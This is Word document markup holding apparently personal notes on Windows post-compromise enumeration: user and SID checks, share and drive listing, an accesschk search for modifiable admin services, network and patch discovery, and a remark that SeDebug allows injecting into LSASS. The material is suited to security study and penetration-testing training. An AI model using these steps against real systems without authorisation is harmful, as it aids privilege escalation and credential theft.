    <w:p w14:paraId="507F16A3" w14:textId="7F82F75D" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36943878" w14:textId="124FBC3C" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>whoami /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47117B" w14:textId="53984D4B" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">sid is the 1s and 0s of your user, get applied to all kinds of </w:t>
      </w:r>
      <w:r w:rsidR="00F37DE0" w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14769D3D" w14:textId="34988F00" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sids have a prefix of s-</w:t>
      </w:r>
      <w:r w:rsidR="00F37DE0" w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1-5-21.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AE2E3" w14:textId="52312039" w:rsidR="007B3D1E" w:rsidRPr="00F37DE0" w:rsidRDefault="007B3D1E" w:rsidP="00F37DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">3 large numbers in the middle are the domain </w:t>
      </w:r>
      <w:r w:rsidR="00F37DE0" w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EDB01" w14:textId="287DAD24" w:rsidR="007B3D1E" w:rsidRPr="00F37DE0" w:rsidRDefault="007B3D1E" w:rsidP="00F37DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">can be used in a lot of </w:t>
      </w:r>
      <w:r w:rsidR="00F37DE0" w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004AC93" w14:textId="37D09FF9" w:rsidR="007B3D1E" w:rsidRPr="00F37DE0" w:rsidRDefault="00F37DE0" w:rsidP="00F37DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>rivileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D5CF1" w14:textId="5995E1C2" w:rsidR="007B3D1E" w:rsidRPr="00F37DE0" w:rsidRDefault="007B3D1E" w:rsidP="00F37DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sedebug - says this user can debug any process on the system</w:t>
      </w:r>
      <w:r w:rsidR="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF11BD7" w14:textId="77777777" w:rsidR="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00F37DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">if guest user has this, they can debug </w:t>
      </w:r>
      <w:r w:rsidR="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and others THEY CAN INJECT INTO IT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC365B7" w14:textId="088B3807" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921E0FE" w14:textId="7F6D7F55" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic useraccount [list full]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C13D00" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174E02D8" w14:textId="699DB89C" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>FILES FOLDERS AND DRIVES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFC3C7" w14:textId="7ADAC35C" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>fsutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9682B0" w14:textId="4A39E88B" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">fsutil fsinfo </w:t>
      </w:r>
      <w:r w:rsidR="00726034" w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282041CD" w14:textId="2A9AFB22" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>must be admin to run</w:t>
      </w:r>
      <w:r w:rsidR="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78892139" w14:textId="2C6AFEEB" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="00726034" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCC7A0C" w14:textId="53640123" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272FF65" w14:textId="2AA5D096" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="00726034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic logicaldisk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE6119" w14:textId="77777777" w:rsidR="00726034" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic share [list brief]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC96C" w14:textId="75A340EB" w:rsidR="007B3D1E" w:rsidRPr="00726034" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB0011" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Children C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E38C2" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C14473C" w14:textId="43DFBAF2" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PERMISSIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FDC40E" w14:textId="71A4A0EE" w:rsidR="007B3D1E" w:rsidRPr="00AF5715" w:rsidRDefault="007B3D1E" w:rsidP="00AF5715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>accesschk.exe -uwcq * | findstr /v AUTHORITY | findstf /v Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12571F49" w14:textId="28A57F4A" w:rsidR="007B3D1E" w:rsidRPr="00AF5715" w:rsidRDefault="007B3D1E" w:rsidP="00AF5715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">find modifiable services owned by </w:t>
      </w:r>
      <w:r w:rsidR="00765328" w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357F0F6" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC3E51C" w14:textId="00129AD3" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NETWORKING / CONNECTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939318C" w14:textId="52945F56" w:rsidR="007B3D1E" w:rsidRPr="00AF5715" w:rsidRDefault="007B3D1E" w:rsidP="00AF5715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ipconfig /displaydns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EA18D" w14:textId="2C1A6ACE" w:rsidR="007B3D1E" w:rsidRPr="00AF5715" w:rsidRDefault="00765328" w:rsidP="00AF5715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> entries cached on computer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F861F6" w14:textId="2591A5B7" w:rsidR="007B3D1E" w:rsidRPr="00AF5715" w:rsidRDefault="007B3D1E" w:rsidP="00AF5715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">don't usually know much about internal </w:t>
      </w:r>
      <w:r w:rsidR="00765328" w:rsidRPr="00AF5715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2D5A3" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A9BB1" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613A81A" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic ntdomain list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2495E8" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597C26C" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nbstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A543F" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694EB267" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*INSTALLED APPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EF822" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic qfe get hotfixid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E21D43E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic /output:C:\InstallList.txt product get name,version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D82897" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Powershell Get-ItemProperty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2999E912" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108F2492" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
